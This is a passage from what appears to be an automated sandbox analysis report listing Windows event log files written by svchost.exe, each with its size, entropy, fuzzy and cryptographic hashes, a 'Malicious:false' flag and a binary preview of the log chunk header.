                              Encrypted:false
                              SSDEEP:1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
                              MD5:605D94FA0C65C59EECEECC2BEB2F61B5
                              SHA1:28CA14F5E02A0A0348C4AC4A22BC228390B64F94
                              SHA-256:4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
                              SHA-512:10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
                              Malicious:false
                              Preview:ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.471207858391493
                              Encrypted:false
                              SSDEEP:1536:W/yzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBtpeNYyQ1y9MtRjzYC43sP:SyzFyNsk4cLSKph9YC/cmqb5tKGjDLSd
                              MD5:40E805871A55E8ADAB346B2407360420
                              SHA1:9B10A8FCF1CCAC78E3E5D2FA43418AC7061BAF75
                              SHA-256:AABDC5806ECE52339311B55725E3D9F36FC3CA8388AC327757D67EA6E2C58564
                              SHA-512:35653A15850C739FBB6CCA0ECC803CB0762BB403A879C1EADA8BF7223EC7DD332E1ADF8E79C7689D154CD78802B9C8F9F52C575CD4EEE6E5C9F2713AA00A182D
                              Malicious:false
                              Preview:ElfChnk.+.......[.......+.......[...........X]...^.........................................................................?.>.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:......**......+.......*^..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.517082344367377
                              Encrypted:false
                              SSDEEP:384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
                              MD5:2628D3458E9FBE638FC3A49E317866FA
                              SHA1:8DB033ED373F8A837073679CE0F3B5DC1BD7085B
                              SHA-256:D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
                              SHA-512:6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
                              Malicious:false
                              Preview:ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.314954486903959
                              Encrypted:false
                              SSDEEP:384:5mhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauia:s6Ovc0S5UyEeDgLpIC4DoA4
                              MD5:864CAA67E4BF2A335E088526FF347CD9
                              SHA1:64E224001D864A18D4999F5D33A42C532877A361
                              SHA-256:C904C319101B31E991343FC8FF2929F6841599C9DCC23AC6218272F630AD5894
                              SHA-512:B899FA6CDC7D0F97BACCC9025516045878BBA58E86ADEA79AA164B3B27F00F6E52F8B8838210A3ECD0C0E6A20D9DD48A4A4754F7408C1DA5F1FDC2EE7A504231
                              Malicious:false
                              Preview:ElfChnk.........A...............A............u...v..........................................................................c.w.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.773262505715791
                              Encrypted:false
                              SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
                              MD5:C06B3BF303EBDD17D76D87B596EE5407
                              SHA1:BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
                              SHA-256:26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
                              SHA-512:7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
                              Malicious:false
                              Preview:ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.2371167268838485
                              Encrypted:false
                              SSDEEP:384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
                              MD5:3F2115642206C3D448781C58F4EE8AF3
                              SHA1:1408F4FF05D6887F74B445E296BC9B69163EDDAE
                              SHA-256:84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
                              SHA-512:C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
                              Malicious:false
                              Preview:ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.1631981097466806
                              Encrypted:false
                              SSDEEP:384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
                              MD5:CBAE5379AAAD2B6A84714F5CEA39ACFA
                              SHA1:A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
                              SHA-256:726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
                              SHA-512:7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
                              Malicious:false
                              Preview:ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.036288214996343
                              Encrypted:false
                              SSDEEP:384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
                              MD5:80B64057A5C06D0016A06F2D493CF301
                              SHA1:452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
                              SHA-256:5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
                              SHA-512:4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
                              Malicious:false
                              Preview:ElfChnk.\...............\.......................X...j.......................................................................LU.t................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.166433348209963
                              Encrypted:false
                              SSDEEP:384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
                              MD5:9AB3073B8BEBBC3C1E9DCB47217C8E27
                              SHA1:33477618A675262EFDC74FACE70AE448EE9CAA05
                              SHA-256:E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
                              SHA-512:58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
                              Malicious:false
                              Preview:ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.534111714365454
                              Encrypted:false
                              SSDEEP:384:ThzMOYQNM6dM1MoYFMoYOKIKFKSKBKYKWKOKHxK/4KFKwKZKD4aKdKcKFKcKqKRk:T5sFcBKNL0
                              MD5:0351C491B0F00BF50BFF2FACBC437BF7
                              SHA1:C4EBBEC9DE4EEAC2BF3AECCA034F9D03641A9DB7
                              SHA-256:431FCF2A6AB12F2DF26D4052A956F4CB7B1B4569647F0C53F516A0C00E4DF722
                              SHA-512:B6241C7FCCBE68F99ED8FA54BF01930F3EBC329D6BC75CA2A7D3AFEFBBA462417C4030CACEF505AA5817DC2F400C6F9E815125698465307EBEE12AD87E5BF914
                              Malicious:false
                              Preview:ElfChnk..%.......%.......%.......%...........u...x...it#....................................................................}.4.........................................6...=...........................................................................................................................f...............?...........................m...................M...F........................H..................................u...............................................&........*..............................**..0....%.......t.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.17991581028056
                              Encrypted:false
                              SSDEEP:384:rhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmEUm:rY7L8
                              MD5:29CF641A1656E6FFEC4DA85C7A079801
                              SHA1:6A093C377E4E2A2349521BCB196B807002771743
                              SHA-256:6CB6D3212C814BAA774E18560C973DF8348B01E9828CF9A70CCEDE9F41F91D91
                              SHA-512:D7A3F33542175B9192DCD1A6FC09B01B0CB4FFFA2532032B76D03141C95F42E40D29882E921C751E112F7254FD6BC1C4F7C4FA1B7B84A8014A60AFE8831EAEC6
                              Malicious:false
                              Preview:ElfChnk......................................1..(4....T.......................................................................b................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.2041002701676904
                              Encrypted:false
                              SSDEEP:48:MqDVWd8NrP+8QNRBEZWTENO4brBE3ovp/6y:z54NVaO8ioR/6y
                              MD5:BECFC11F7F0E9C8E94C62DC3A9774E67
                              SHA1:FF160D83C9250889DC6AF6C681C4907080E11C2C
                              SHA-256:A64D4374204D925F5D02DAF04A35D16341459C8745E94BA3CCE4D90EABEEAE7C
                              SHA-512:3F595984F4E5E3663FB986803172B89C9E9EE671E0D1EB643C825D8FB0416D076AF5A3107E3A35AA803EF9876E6F45FBFFF5A0D5F5CDD6BD1E1C3A488B45523D
                              Malicious:false
                              Preview:ElfChnk...............................................Q......................................................................H.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**...............z..g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.9658503180918458
                              Encrypted:false
                              SSDEEP:384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
                              MD5:9961A2C4F5AC430AB4FE55D69904E2C9
                              SHA1:BA49A1A12A889812148BECC8D5B285AD418D54FE
                              SHA-256:EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
                              SHA-512:B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
                              Malicious:false
                              Preview:ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.404493888114613
                              Encrypted:false
                              SSDEEP:768:B6aQLVaLaDaja/aOWaXabaXajaSOaDa/ararafaTafa/aLaPaHaLajaTavaHajaO:SLM0
                              MD5:93CBE830C36294EE7C54531CAF3B20E2
                              SHA1:9AE23F9A8FCDBAA196771E58A26331C4D8318FBE
                              SHA-256:27304617C3334BB2E9492FDAC7376C33DEF42456CF11FB12CE596EEB9FB6BB87
                              SHA-512:5C718F397A4086AB702CE198809214B295A7679B37D647219D90C3E78B54139864D8537F09446B4E11AEF73DAC20B61F14CF24C6D9205DB958F3E755B6318F52
                              Malicious:false
                              Preview:ElfChnk.........@...............@...............`...NF.0....................................................................]5.=................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...........o...f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.3650161876414235
                              Encrypted:false
                              SSDEEP:384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
                              MD5:346E087AE87A771402B2E38619AB7B71
                              SHA1:4B7EFEA99E401A5E6C0D115E2B27C48778704C13
                              SHA-256:82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
                              SHA-512:63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
                              Malicious:false
                              Preview:ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.335318634068108
                              Encrypted:false
                              SSDEEP:384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
                              MD5:3B31610BEABB5895A19C346C64C234C6
                              SHA1:84316C06991A51AD91C247130B615F0E56CD4D01
                              SHA-256:EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
                              SHA-512:2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
                              Malicious:false
                              Preview:ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.7112352075765392
                              Encrypted:false
                              SSDEEP:192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
                              MD5:5D63AFB3EA60A7655FF95B4DB1B451E0
                              SHA1:B5D236316CC6617071D83D7E1B4367DDA1A889B1
                              SHA-256:815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
                              SHA-512:C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
                              Malicious:false
                              Preview:ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.3430716270609357
                              Encrypted:false
                              SSDEEP:768:hvEpP9JcY6+g4+Ga6ozR313xIb13xIb13xIt13xI:hspP9JcY6+g4+Ga6
                              MD5:1D24384BB963B9F4A0F4612A2D00DB76
                              SHA1:9DF5AE983341966DF5D47D766C3D0EB867CA498D
                              SHA-256:EFBF2805180CF650B62236A2E766391DC7E80A82E742C88729822E9F230D2B2E
                              SHA-512:16A79FF507631A74B11FBE5C0DD27A76A0C4C1AFC7867B87D3863326AF71BD1407CDC4A9C123C09928D58FE9DFC96EC68F818AE317780C8BCB5015624EE867C7
                              Malicious:false
                              Preview:ElfChnk.....................................x ..."....d....................................................................]..m................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................^.......3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.364133037256648
                              Encrypted:false
                              SSDEEP:384:dZhlR0CsRNHrRhR0yRp+RiRRhRahARh1ZFRbmXR9XPRFrRXVRcrRb8RWRrR4QRSH:dZi4VYHm3X3NI538LMi
                              MD5:C21784B5B442FCE64BEEF6DA67C578AA
                              SHA1:729FDCBCF7A177A74D6B199885C3C6B078BEDE7B
                              SHA-256:F01270056ACDCABF13F7A1F84D8F9D1DDDB195E38C5BF54FDAE5AB65A680D22A
                              SHA-512:AB53904FE1C3DE09EE053FCA9842B8937279249CFD7038AD757786810580C391F0B947C0FFFEBB3597DE18C31E099441BBE2048AA0D565C08283BE6B60B2880A
                              Malicious:false
                              Preview:ElfChnk.J.......P.......J.......P............ ..p%...Fq.....................................................................z.TA....................C.......Q...........N...=.......................................0"..d.......................7#..........................................?.......(...f...+...........?....................... .......................M...F...............................................&............................................................"..................................*...**......J.........l.f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.282820835556058
                              Encrypted:false
                              SSDEEP:384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
                              MD5:7DB7567819F7CFC6955126B8306826E6
                              SHA1:45CCB1C41CA1C6E1384207444A8B84437408DF1A
                              SHA-256:0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
                              SHA-512:FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
                              Malicious:false
                              Preview:ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
